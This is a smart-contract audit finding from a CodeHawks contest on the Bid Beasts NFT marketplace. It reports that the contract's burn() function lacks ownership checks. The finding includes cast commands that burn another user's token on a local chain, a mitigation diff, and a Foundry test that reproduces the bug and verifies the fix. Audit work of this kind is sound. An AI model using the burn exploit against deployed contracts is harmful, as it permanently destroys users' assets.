Bid Beasts

First Flight #49
Tags: Beginner Friendly, Foundry, Solidity, NFT
100 EXP
Submission Details
Severity: high
Valid

Unauthorized BidBeastNft::burn() Function Allows Arbitrary NFT Destruction, Creating Irrecoverable Asset Loss for Users and Unpayable Protocol NFT Debt

Description

Normal Behavior
When the protocol mints NFTs, each minted token should remain valid and transferable, and should be burnable only by its owner or by an account the owner has authorized (a per-token approval or an approved operator).

Issues
1. User-owned NFT

  • Any external account can call burn() on any token id and destroy another user's NFT; the caller needs neither ownership of nor approval for the token.

  • The token is destroyed permanently, so the holder suffers an irrecoverable asset loss, which undermines trust in the protocol.


2. NFT in marketplace/auction

  • If NFTs are held by the marketplace contract during a listing or auction, an attacker can burn them before the sale settles. The listing then references a token that no longer exists: the auction flow is broken, the listing is invalid, and a buyer whose purchase goes through may have paid for an asset that cannot be delivered. This is protocol-level NFT debt: the marketplace has promised an asset it can no longer hand over.

Relevant Github Link: https://github.com/CodeHawks-Contests/2025-09-bid-beasts/blob/449341c55a57d3f078d1250051a7b34625d3aa04/src/BidBeasts_NFT_ERC721.sol#L23C5-L26C6

    @> function burn(uint256 _tokenId) public {
           _burn(_tokenId);
           emit BidBeastsBurn(msg.sender, _tokenId);
       }

Risk

Likelihood:

High. burn() performs no ownership or approval check, so any externally owned account or contract can call it with any token id. The attack costs nothing beyond gas, needs no setup, and can be repeated for every minted token.

Impact:

High. Unauthorized burns permanently destroy user-owned NFTs and break marketplace operations for any token the marketplace is holding. The destroyed assets cannot be recovered, and the protocol's trust and integrity are undermined.

Proof of Concept

  1. Deploy BidBeastsNFT and BidbeastNftMarket on a local Anvil chain.

    anvil &
    forge script script/BidBeastsNFTMarketPlace.s.sol --rpc-url http://127.0.0.1:8545 --private-key <deployer-key> --broadcast

  2. Mint an NFT to a user as the authorized minter.

    cast send <BidBeastNftAddress> "mint(address)" <UserAddress> --rpc-url http://127.0.0.1:8545 --private-key <deployer-key>


  3. Burn the NFT from an unrelated account (the attacker key belongs to a funded account that neither owns nor is approved for the token).

    cast send <BidBeastNftAddress> "burn(uint256)" <tokenId> --rpc-url http://127.0.0.1:8545 --private-key <attacker-key>


  4. Verify that the rightful owner has permanently lost the NFT: the balance, which was 1 after step 2, is now 0, and the token id no longer exists on the contract.

    cast call <BidBeastNftAddress> "balanceOf(address)(uint256)" <NFTOwnerAddress> --rpc-url http://127.0.0.1:8545

Recommended Mitigation

Add an ownership and authorization check before burning so that only the token's owner, an address approved for that token, or an approved operator can destroy it. With the OpenZeppelin v5 ERC721 base (which is where the internal `_checkAuthorized` helper below comes from) the check is two lines. Reading `ownerOf` first also makes a burn of a non-existent token id fail early with a clear revert instead of reaching `_burn`. Inheriting OpenZeppelin's ERC721Burnable is an equivalent fix: its burn() calls `_update(address(0), tokenId, _msgSender())`, which performs the same authorization check internally.

    function burn(uint256 _tokenId) public {
    +   address owner = ownerOf(_tokenId); // also reverts if nonexistent
    +   _checkAuthorized(owner, msg.sender, _tokenId);
        _burn(_tokenId);
        emit BidBeastsBurn(msg.sender, _tokenId);
    }
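The following Foundry test is an added example, not code from the BidBeasts repository or this submission. It reproduces both issues from the Description (an unrelated account burning a user-owned token, and burning a token while the marketplace holds it) against a minimal stand-in for the vulnerable contract, then shows the recommended two-line check rejecting the same call while still letting the owner and an approved operator burn. It assumes a standard Foundry layout with forge-std and OpenZeppelin Contracts v5 installed; the `VulnerableNft`, `FixedNft` and `BurnAuthTest` contracts and the `user`, `market` and `attacker` addresses are constructed for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example (not the BidBeasts source). Assumes forge-std and
// OpenZeppelin Contracts v5 are installed as in a standard Foundry project.
import {Test} from "forge-std/Test.sol";
import {ERC721} from "@openzeppelin/contracts/token/ERC721/ERC721.sol";
import {IERC721Errors} from "@openzeppelin/contracts/interfaces/draft-IERC6093.sol";

// Stand-in for the vulnerable contract: burn() reaches _burn() with no auth check.
contract VulnerableNft is ERC721 {
    uint256 public nextId;

    constructor() ERC721("Vuln", "VULN") {}

    function mint(address to) external returns (uint256 id) {
        id = nextId++;
        _mint(to, id);
    }

    function burn(uint256 tokenId) public virtual {
        _burn(tokenId); // anyone can reach this line for any token id
    }
}

// Hardened version: the recommended check before _burn().
contract FixedNft is VulnerableNft {
    function burn(uint256 tokenId) public override {
        address owner = ownerOf(tokenId);             // reverts if the token does not exist
        _checkAuthorized(owner, msg.sender, tokenId); // owner, per-token approvee or operator only
        _burn(tokenId);
    }
}

contract BurnAuthTest is Test {
    address internal user = makeAddr("user");
    address internal market = makeAddr("market");   // stands in for the marketplace escrow
    address internal attacker = makeAddr("attacker");

    // Issue 1: an unrelated account destroys a user-owned token.
    function test_Vulnerable_AttackerBurnsUserToken() public {
        VulnerableNft nft = new VulnerableNft();
        uint256 id = nft.mint(user);
        assertEq(nft.ownerOf(id), user);

        vm.prank(attacker);
        nft.burn(id); // succeeds: attacker holds nothing and was never approved

        assertEq(nft.balanceOf(user), 0);
        vm.expectRevert(abi.encodeWithSelector(IERC721Errors.ERC721NonexistentToken.selector, id));
        nft.ownerOf(id);
    }

    // Issue 2: a token held by the marketplace is burned before the sale settles.
    function test_Vulnerable_AttackerBurnsEscrowedToken() public {
        VulnerableNft nft = new VulnerableNft();
        uint256 id = nft.mint(user);
        vm.prank(user);
        nft.transferFrom(user, market, id); // user lists: the market now holds the token

        vm.prank(attacker);
        nft.burn(id);

        assertEq(nft.balanceOf(market), 0); // the market can no longer deliver the token
    }

    // Fixed contract: the attacker's call reverts; owner and approved operator still can burn.
    function test_Fixed_OnlyOwnerOrApprovedCanBurn() public {
        FixedNft nft = new FixedNft();
        uint256 id = nft.mint(user);

        vm.prank(attacker);
        vm.expectRevert(
            abi.encodeWithSelector(IERC721Errors.ERC721InsufficientApproval.selector, attacker, id)
        );
        nft.burn(id);
        assertEq(nft.ownerOf(id), user); // untouched

        vm.prank(user);
        nft.approve(attacker, id);       // owner explicitly approves the attacker address
        vm.prank(attacker);
        nft.burn(id);                    // now permitted
        assertEq(nft.balanceOf(user), 0);

        // A non-existent id fails at ownerOf(), before any state change.
        vm.expectRevert(abi.encodeWithSelector(IERC721Errors.ERC721NonexistentToken.selector, id));
        nft.burn(id);
    }
}
```

Run it with `forge test --match-contract BurnAuthTest -vvv`. The two `Vulnerable_` tests pass only because the bug exists, which is the behaviour the PoC above demonstrates with `cast`; the `Fixed_` test pins down the exact revert an unauthorized caller gets after the mitigation, so a regression that drops the check would fail it.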
Updates

Lead Judging Commences

cryptoghost Lead Judge 3 months ago
Submission Judgement Published
Validated
Assigned finding tags:

BidBeasts ERC721: Anyone Can Burn

In the BidBeasts ERC721 implementation, the burn function is publicly accessible, allowing any external user to burn NFTs they do not own. This exposes all tokens to unauthorized destruction and results in permanent asset loss.
